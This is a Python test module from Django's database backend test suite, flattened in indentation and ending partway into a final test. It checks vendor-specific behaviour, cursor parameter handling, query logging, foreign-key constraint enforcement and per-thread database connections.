from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (
DEFAULT_DB_ALIAS, DatabaseError, IntegrityError, connection, connections,
reset_queries, transaction,
)
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.backends.signals import connection_created
from django.db.backends.utils import CursorWrapper, format_number
from django.db.models import Avg, StdDev, Sum, Variance
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (
TestCase, TransactionTestCase, mock, override_settings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.utils import ignore_warnings, str_prefix
from django.utils import six
from django.utils.deprecation import RemovedInDjango19Warning
from django.utils.six.moves import range
from . import models
class DummyBackendTest(TestCase):
def test_no_databases(self):
"""
Test that an empty DATABASES setting defaults to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
with self.assertRaises(ImproperlyConfigured):
conns[DEFAULT_DB_ALIAS].ensure_connection()
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in range(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(models.Square)
statements = editor.collected_sql
match = re.search('"id" ([^,]+),', statements[0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate,
**{'complex': aggregate('last_modified') + aggregate('last_modified')})
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses("PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 90301)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
databases = copy.deepcopy(settings.DATABASES)
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['AUTOCOMMIT'] = False
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def test_connect_isolation_level(self):
"""
Regression test for #18130 and #24318.
"""
from psycopg2.extensions import (
ISOLATION_LEVEL_READ_COMMITTED as read_committed,
ISOLATION_LEVEL_SERIALIZABLE as serializable,
)
# Since this is a django.test.TestCase, a transaction is in progress
# and the isolation level isn't reported as 0. This test assumes that
# PostgreSQL is configured with the default isolation level.
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(connection.connection.isolation_level, read_committed)
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['OPTIONS']['isolation_level'] = serializable
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Start a transaction so the isolation level isn't reported as 0.
new_connection.set_autocommit(False)
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(new_connection.connection.isolation_level, serializable)
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
def test_correct_extraction_psycopg2_version(self):
from django.db.backends.postgresql_psycopg2.base import psycopg2_version
version_path = 'django.db.backends.postgresql_psycopg2.base.Database.__version__'
with mock.patch(version_path, '2.6.9'):
self.assertEqual(psycopg2_version(), (2, 6, 9))
with mock.patch(version_path, '2.5.dev0'):
self.assertEqual(psycopg2_version(), (2, 5))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc`` method, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
Test the custom ``django_date_extract`` method, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
try:
connection.ops.last_executed_query(cursor, '', ())
except Exception:
self.fail("'last_executed_query' should not raise an exception.")
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
Test that last_executed_query() returns a Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following test would be a good one to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TransactionTestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check that it is. Refs #8901.
"""
available_apps = ['backends']
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
# A full flush is too expensive for this test, so we dig into the
# internals to generate the likely offending SQL and run it manually.
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
# '%s' escaping support for sqlite3 #13648
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
# response should be a non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TransactionTestCase):
available_apps = ['backends']
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
# Test cursor.executemany #4896
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
# Test executemany with params=[] does nothing #4765
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
# Test executemany accepts iterators #10320
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
# fetchone, fetchmany, fetchall return strings as unicode objects #6254
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
Test that DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
        # accessing a closed cursor (psycopg2 raises InterfaceError, the rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
        # psycopg2 lets us check that via the cursor's closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
with connection.cursor() as cursor:
reset_queries()
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
six.assertCountEqual(self, connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
Test that the backend doesn't store an unlimited number of queries.
Regression for #12581.
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(str(w[0].message), "Limit for query logging "
"exceeded, only the last 3 queries will be returned.")
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# Instead, the tests simply trigger the violation and verify that the exception
# raised is django.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
# Retrieve the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
        When constraint checks are disabled, it should be possible to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
        When constraint checks are disabled (using a context manager), it should be possible to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TransactionTestCase):
available_apps = ['backends']
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
        # Check that each created connection got a different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
    Zero as id for AutoField should raise an exception in MySQL, because MySQL
does not allow zero for autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TestCase):
def test_can_reference_existent(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
